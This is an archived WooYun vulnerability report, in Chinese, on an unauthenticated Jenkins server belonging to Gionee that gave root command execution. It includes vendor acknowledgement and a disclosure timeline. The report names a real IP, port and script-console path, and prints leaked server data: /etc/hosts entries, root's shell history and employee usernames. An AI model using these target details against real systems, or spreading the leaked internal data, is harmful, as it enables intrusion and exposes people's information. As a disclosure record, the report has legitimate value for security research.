金立手机某系统未授权访问导致命令执行/root权限

2017年5月3日00:45:44评论314 views字数 220阅读0分44秒阅读模式

摘要

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-10：厂商已经确认，细节仅向厂商公开
2016-03-20：细节向核心白帽子及相关领域专家公开
2016-03-30：细节向普通白帽子公开
2016-04-09：细节向实习白帽子公开
2016-04-24：细节向公众公开

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-182909

漏洞标题：金立手机某系统未授权访问导致命令执行/root权限

漏洞作者：路人甲

提交时间： 2016-03-10 12:45

公开时间： 2016-04-24 14:11

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行未授权访问

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

mask 区域

1.http://**.**.**/bugs/wooyun-2016-0179640_
 *****。*****
 **********
 *****授权*****
 2.http://**.**.**/_
 **********
 *****86d1222f3292ca73467f.png&qu*****
 **********
 **********
 3.http://**.**.**/script_
 **********
 **********
 *****5b9087df5140a1175def.png&qu*****
 **********
 *****c/ho*****
 **********
 *****3acc29caad88758e5ccb.png&qu*****
 **********
 ***** following line,*****
 *****functionalit*****
 ***** loca*****
 *****aldomain6 *****
 *****est-perf*****
 *****est-perft*****
 **********
 ***** ptest.g*****
 **********
 *****.ptest.gi*****
 *****sets.ptes*****
 *****rdzb4pZ<*****
 **********
 *****istory (*****
 **********
 *****;#1456*****
 *****x.co*****
 *****140*****
 *****l*****
 *****140*****
 *****nf.*****
 *****140*****
 *****l*****
 *****140*****
 *****st.gion*****
 *****140*****
 *****t.gione*****
 *****140*****
 *****!*****
 *****140*****
 *****code&*****
 **********
 *****ome*****
 *****gt;ch*****
 *****wb*****
 *****nw*****
 *****ch*****
 *****gw*****
 *****enx*****
 *****gx*****
 *****ngw*****
 *****pe*****
 *****io*****
 *****ro*****
 *****gh*****
 *****gy*****
 *****w*****
 *****lo*****
 *****ro*****
 *****nli*****
 *****kj*****
 *****jy*****
 *****t;/co*****
 **********
 **********
 *****所谓*****

漏洞证明：

WooYun: 金立手机某系统存在命令执行漏洞root权限/一大波项目源码

第二弹。。。

jenkins 未授权访问

http://120.26.232.224:8000/

命令执行url

http://120.26.232.224:8000/script

root权限

cat /etc/hosts

code 区域

# Do not remove the following line, or various programs
 # that require network functionality will fail.
 127.0.0.1 localhost
 ::1  localhost6.localdomain6 localhost6
 10.200.137.76 test-perftest-s-03
 #42.121.110.227 test-perftest-s-03
 
 #42.121.110.227 ptest.gionee.com
 
 #10.200.137.76 3g.ptest.gionee.com
 #10.200.137.76 assets.ptest.gionee.com
 10.117.67.237 iZ23jrdzb4pZ

cat /root/.bash_history (部分内容)

code 区域

#1456140295
 vi nginx.conf
 #1456140321
 ll
 #1456140325
 cd conf.d/
 #1456140326
 ll
 #1456140330
 vi assets.ptest.gionee.com 
 #1456140343
 cat a.3g.ptest.gionee.com 
 #1456140351
 q!
 #1456140352
 exit

ls /home

code 区域

chendy
 daiwb
 duanwm
 fanch
 fangwei
 fengwenxing
 kongxh
 lujiangwei
 luopeng
 nagios
 qinrong
 wanghj
 wangyy
 www
 wwwlogs
 wwwroot
 xieminliang
 xuekj
 yinjy
 zhanggq

内网不内网的无所谓的 aliyun主机

修复方案：

jenkins 未授权访问

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-10 14:11

厂商回复：

谢谢。已经通知相关部门同事

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-10 13:02 | 带头大哥 ( 普通白帽子 | Rank:879 漏洞数:258 | |任意邮件伪造| |目录遍历| |任意文件读取|...)

1

大表哥就是6

1# 回复此人

漏洞概要 关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-182909

漏洞标题： 金立手机某系统未授权访问导致命令执行/root权限

相关厂商： gionee.com

漏洞作者： 路人甲

提交时间： 2016-03-10 12:45

公开时间： 2016-04-24 14:11

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 远程命令执行 未授权访问

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(4) 关注此漏洞

漏洞标题：金立手机某系统未授权访问导致命令执行/root权限

漏洞作者：路人甲

漏洞类型：命令执行

危害等级：高

漏洞状态：厂商已经确认

Tags标签：远程命令执行未授权访问

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分